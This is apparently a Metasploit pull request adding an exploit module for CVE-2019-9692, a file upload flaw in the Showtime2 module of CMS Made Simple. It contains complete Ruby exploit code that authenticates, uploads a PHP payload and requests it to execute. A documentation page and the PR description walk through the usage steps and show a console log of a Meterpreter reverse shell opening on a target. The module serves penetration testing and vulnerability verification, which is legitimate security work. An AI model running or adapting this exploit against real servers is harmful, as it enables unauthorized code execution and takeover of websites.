### PR TITLE
Add CMS Made Simple (CMSMS) Showtime2 File Upload RCE (CVE-2019-9692)

### DIFF
--- a/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md
+++ b/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md
@@ -1,6 +1,6 @@
 ## Description
 
-This module exploits a File Upload vulnerability that lead in a RCE in the Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS) throught users with the "Use Showtime2" privilege.
+This module exploits a File Upload vulnerability that lead in a RCE in Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated user with "Use Showtime2" privilege could exploit the vulnerability.
 
 The vulnerability exists in the Showtime2 module, where the class "class.showtime2_image.php" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).
 

--- a/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md
+++ b/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md
@@ -1,0 +1,70 @@
+## Description
+
+This module exploits a File Upload vulnerability that lead in a RCE in the Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS) throught users with the "Use Showtime2" privilege.
+
+The vulnerability exists in the Showtime2 module, where the class "class.showtime2_image.php" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).
+
+Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1 and 2.2.10
+
+## Vulnerable Application
+
+Affecting Showtime2 CMS Made Simple (CMSMS) module, version 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2
+
+## Verification Steps
+
+1. Setting up a working installation of CMS Made Simple (CMSMS)
+2. Download Showtime2 module (< 3.6.3)
+3. Log-in to admin panel with the administrator credentials
+4. Go in *site admin* => *Module Manager* and import the Showtime2 module
+5. Once the module is uploaded, click on *install* to install the module
+6. [OPTIONALLY] setting up a new user, assign it to a group and set the *Use Showtime2* permissions on group
+7. Start `msfconsole`
+8. `use exploit/multi/http/cmsms_showtime2_rce`
+9. `set RHOST <IP>`
+10. `set USERNAME <USERNAME>`
+11. `set PASSWORD <PASSWORD>`
+12. `check`
+13. You should see `The target appears to be vulnerable.`
+14. `exploit`
+15. You should get a meterpreter session!
+
+## Options
+
+* **TARGETURI**: Path to CMS Made Simple (CMSMS) App installation (“/” is the default)
+* **USERNAME**: Username to authenticate with
+* **PASSWORD**: Password to authenticate with
+
+## Scenario
+
+### Tested on Showtime 3.6.2 on CMS Made Simple (CMMS) 2.2.10
+
+```
+msf5 > use exploit/multi/http/cmsms_showtime2_rce 
+msf5 exploit(multi/http/cmsms_showtime2_rce) > set rhost target.com
+rhost => target.com
+msf5 exploit(multi/http/cmsms_showtime2_rce) > check
+
+[*] Showtime2 version: 3.6.2
+[*] 192.168.2.59:80 - The target appears to be vulnerable.
+msf5 exploit(multi/http/cmsms_showtime2_rce) > set username Designer
+username => Designer
+msf5 exploit(multi/http/cmsms_showtime2_rce) > set password d3s1gn3r
+password => d3s1gn3r
+msf5 exploit(multi/http/cmsms_showtime2_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.8.2:4444 
+[*] Showtime2 version: 3.6.2
+[*] Uploading PHP payload.
+[*] Making request for '/06wp7Fen.php' to execute payload.
+[*] Sending stage (38247 bytes) to 192.168.2.59
+[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:59932) at 2019-03-19 23:27:07 +0100
+[!] Tried to delete ./06wp7Fen.php, unknown result
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/cmsms_showtime2_rce) > 
+```

--- a/modules/exploits/multi/http/cmsms_showtime2_rce.rb
+++ b/modules/exploits/multi/http/cmsms_showtime2_rce.rb
@@ -69,9 +69,10 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, 'Connection failed')
     end
 
-    if res.code == 302 && res.get_cookies =~ /__c=([^deleted].+?);/
+    if res.code == 302
       # datastore['sid'] = $1
-      datastore['sid'] = res.get_cookies.scan(/__c=(.+?);/).flatten.last.to_s
+      datastore['csrf_name'] = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-2].to_s
+      datastore['csrf_value'] = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-1].to_s
       datastore['cookies'] = res.get_cookies
       return
     end
@@ -84,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = Rex::MIME::Message.new
     data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, "form-data; name=\"mact\"")
     data.add_part('Upload', nil, nil, "form-data; name=\"m1_upload_submit\"")
-    data.add_part(datastore['sid'], nil, nil, "form-data; name=\"__c\"")
+    data.add_part(datastore['csrf_value'], nil, nil, "form-data; name=\"#{datastore['csrf_name']}\"")
     data.add_part(fcontent, 'text/plain', nil, "from-data; name=\"m1_input_browse\"; filename=\"#{fname}\"")
 
     res = send_request_cgi(

--- a/modules/exploits/multi/http/cmsms_showtime2_rce.rb
+++ b/modules/exploits/multi/http/cmsms_showtime2_rce.rb
@@ -13,9 +13,9 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name' => "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
       'Description' => %q(
-        This module exploits a File Upload vulnerability that lead in a RCE in the
-        Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS) throught users with
-        the "Use Showtime2" privilege.
+        This module exploits a File Upload vulnerability that lead in a RCE in
+        Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated
+        user with "Use Showtime2" privilege could exploit the vulnerability.
 
         The vulnerability exists in the Showtime2 module, where the class
         "class.showtime2_image.php" does not ensure that a watermark file
@@ -40,10 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'Platform' => 'php',
       'Arch' => ARCH_PHP,
-      'Targets' =>
-        [
-          ['3.6.2', {}]
-        ],
+      'Targets' => [['Automatic', {}]],
       'Privileged' => false,
       'DisclosureDate' => "Mar 11 2019",
       'DefaultTarget' => 0))
@@ -108,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    return Failure::Unknown
+    print_warning('No confidence in PHP payload success or failure')
   end
 
   def check
@@ -146,9 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fname = "#{rand_text_alphanumeric(3..9)}.php"
     fcontent = "<?php #{payload.encode} ?>"
     print_status('Uploading PHP payload.')
-    if Failure::Unknown == upload(fname, fcontent)
-      print_warning('No confidence in PHP payload success or failure')
-    end
+    upload(fname, fcontent)
 
     # Register uploaded PHP payload file for cleanup
     register_files_for_cleanup('./' + fname)

--- a/modules/exploits/multi/http/cmsms_showtime2_rce.rb
+++ b/modules/exploits/multi/http/cmsms_showtime2_rce.rb
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
-    if res && res.code == 200
+    if res.code == 200
       module_version = Gem::Version.new(res.body.scan(/^version = "?(\d\.\d\.\d)"?/).flatten.first)
       if module_version < Gem::Version.new('3.6.3')
         # Showtime2 module is uploaded and present on "Module Manager" section but it could be NOT installed.

--- a/modules/exploits/multi/http/cmsms_showtime2_rce.rb
+++ b/modules/exploits/multi/http/cmsms_showtime2_rce.rb
@@ -119,7 +119,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless res
-      fail_with(Failure::Unreachable, 'Connection failed')
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
     end
 
     if res && res.code == 200

--- a/modules/exploits/multi/http/cmsms_showtime2_rce.rb
+++ b/modules/exploits/multi/http/cmsms_showtime2_rce.rb
@@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
     do_login
 
     # Upload PHP payload
-    fname = "#{rand_text_alphanumeric(rand(3..9))}.php"
+    fname = "#{rand_text_alphanumeric(3..9)}.php"
     fcontent = "<?php #{payload.encode} ?>"
     print_status('Uploading PHP payload.')
     if Failure::Unknown == upload(fname, fcontent)

--- a/modules/exploits/multi/http/cmsms_showtime2_rce.rb
+++ b/modules/exploits/multi/http/cmsms_showtime2_rce.rb
@@ -1,0 +1,165 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
+      'Description' => %q(
+        This module exploits a File Upload vulnerability that lead in a RCE in the
+        Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS) throught users with
+        the "Use Showtime2" privilege.
+
+        The vulnerability exists in the Showtime2 module, where the class
+        "class.showtime2_image.php" does not ensure that a watermark file
+        has a standard image file extension (GIF, JPG, JPEG, or PNG).
+
+        Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,
+        3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Daniele Scanu', # Discovery & PoC
+          'Fabio Cogno' # Metasploit module
+        ],
+      'References' =>
+        [
+          ['CVE', '2019-9692'],
+          ['CWE', '434'],
+          ['EDB', '46546'],
+          ['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],
+          ['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' =>
+        [
+          ['3.6.2', {}]
+        ],
+      'Privileged' => false,
+      'DisclosureDate' => "Mar 11 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base CMS Made Simple directory path", '/']),
+        OptString.new('USERNAME', [true, "Username to authenticate with", '']),
+        OptString.new('PASSWORD', [false, "Password to authenticate with", ''])
+      ]
+    )
+  end
+
+  def do_login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
+      'vars_post' => {
+        'username' => datastore['username'],
+        'password' => datastore['password'],
+        'loginsubmit' => 'Submit'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res && res.code == 302 && res.get_cookies =~ /__c=([^deleted].+?);/
+      # datastore['sid'] = $1
+      datastore['sid'] = res.get_cookies.scan(/__c=(.+?);/).flatten.last.to_s
+      datastore['cookies'] = res.get_cookies
+      return
+    end
+
+    fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+  end
+
+  def upload(fname, fcontent)
+    # construct POST data
+    data = Rex::MIME::Message.new
+    data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, "form-data; name=\"mact\"")
+    data.add_part('Upload', nil, nil, "form-data; name=\"m1_upload_submit\"")
+    data.add_part(datastore['sid'], nil, nil, "form-data; name=\"__c\"")
+    data.add_part(fcontent, 'text/plain', nil, "from-data; name=\"m1_input_browse\"; filename=\"#{fname}\"")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'),
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s,
+      'headers' => {
+        'Cookie' => datastore['cookies']
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res && res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id="showoverview"/i)
+      return
+    end
+
+    return Failure::Unknown
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      # 'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'changelog.inc')
+      'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'moduleinfo.ini')
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res && res.code == 200
+      module_version = Gem::Version.new(res.body.scan(/^version = "?(\d\.\d\.\d)"?/).flatten.first)
+      if module_version < Gem::Version.new('3.6.3')
+        # Showtime2 module is uploaded and present on "Module Manager" section but it could be NOT installed.
+        print_status("Showtime2 version: #{module_version}")
+        return Exploit::CheckCode::Appears
+      end
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Appears == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    do_login
+
+    # Upload PHP payload
+    fname = "#{rand_text_alphanumeric(rand(3..9))}.php"
+    fcontent = "<?php #{payload.encode} ?>"
+    print_status('Uploading PHP payload.')
+    if Failure::Unknown == upload(fname, fcontent)
+      print_warning('No confidence in PHP payload success or failure')
+    end
+
+    # Register uploaded PHP payload file for cleanup
+    register_files_for_cleanup('./' + fname)
+
+    # Retrieve and execute PHP payload
+    print_status("Making request for '/#{fname}' to execute payload.")
+    send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname)
+      },
+      15
+    )
+  end
+end

--- a/modules/exploits/multi/http/cmsms_showtime2_rce.rb
+++ b/modules/exploits/multi/http/cmsms_showtime2_rce.rb
@@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
       module_version = Gem::Version.new(res.body.scan(/^version = "?(\d\.\d\.\d)"?/).flatten.first)
       if module_version < Gem::Version.new('3.6.3')
         # Showtime2 module is uploaded and present on "Module Manager" section but it could be NOT installed.
-        print_status("Showtime2 version: #{module_version}")
+        vprint_status("Showtime2 version: #{module_version}")
         return Exploit::CheckCode::Appears
       end
     end

--- a/modules/exploits/multi/http/cmsms_showtime2_rce.rb
+++ b/modules/exploits/multi/http/cmsms_showtime2_rce.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, 'Connection failed')
     end
 
-    if res && res.code == 302 && res.get_cookies =~ /__c=([^deleted].+?);/
+    if res.code == 302 && res.get_cookies =~ /__c=([^deleted].+?);/
       # datastore['sid'] = $1
       datastore['sid'] = res.get_cookies.scan(/__c=(.+?);/).flatten.last.to_s
       datastore['cookies'] = res.get_cookies

--- a/modules/exploits/multi/http/cmsms_showtime2_rce.rb
+++ b/modules/exploits/multi/http/cmsms_showtime2_rce.rb
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, 'Connection failed')
     end
 
-    if res && res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id="showoverview"/i)
+    if res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id="showoverview"/i)
       return
     end
 


### PR DESCRIPTION
This module exploits a File Upload vulnerability that lead in a RCE in Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated user with "Use Showtime2" privilege could exploit the vulnerability.

The vulnerability exists in the Showtime2 module, where the class "class.showtime2_image.php" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9692
https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285
http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47

This module has been tested successfully on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1 and 2.2.10

## Verification

The steps needed to make sure this thing works:

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/cmsms_showtime2_rce`
- [x] `set RHOST <IP>`
- [x] `set USERNAME <USERNAME>`
- [x] `set PASSWORD <PASSWORD>`
- [x] `check`
- [x] You should see `The target appears to be vulnerable.`
- [x] `exploit`
- [x] You should get a meterpreter session!

## Scenarios

```
msf5 > use exploit/multi/http/cmsms_showtime2_rce 
msf5 exploit(multi/http/cmsms_showtime2_rce) > set rhost target.com
rhost => target.com
msf5 exploit(multi/http/cmsms_showtime2_rce) > check

[*] Showtime2 version: 3.6.2
[*] 192.168.2.59:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/cmsms_showtime2_rce) > set username Designer
username => Designer
msf5 exploit(multi/http/cmsms_showtime2_rce) > set password d3s1gn3r
password => d3s1gn3r
msf5 exploit(multi/http/cmsms_showtime2_rce) > exploit

[*] Started reverse TCP handler on 10.0.8.2:4444 
[*] Showtime2 version: 3.6.2
[*] Uploading PHP payload.
[*] Making request for '/06wp7Fen.php' to execute payload.
[*] Sending stage (38247 bytes) to 192.168.2.59
[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:59932) at 2019-03-19 23:27:07 +0100
[!] Tried to delete ./06wp7Fen.php, unknown result

meterpreter > getuid
Server username: www-data (33)
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/cmsms_showtime2_rce) > 
```

## Testing

1. Set up a working installation of CMS Made Simple (CMSMS) 2.2.9.1 or 2.2.10
2. Download Showtime2 module (< 3.6.3)
3. Log-in to admin panel with the administrator credentials
4. Go in *site admin* => *Module Manager* and import the Showtime2 module
5. Once the module is uploaded, click on *install* to install the module
6. [OPTIONALLY] setting up a new user, assign it to a group and set the *Use Showtime2* permissions on group
7. Start `msfconsole`
8. `use exploit/multi/http/cmsms_showtime2_rce`
9. `set RHOST <IP>`
10. `set USERNAME <USERNAME>`
11. `set PASSWORD <PASSWORD>`
12. `check`
13. You should see `The target appears to be vulnerable.`
14. `exploit`
15. You should get a meterpreter session!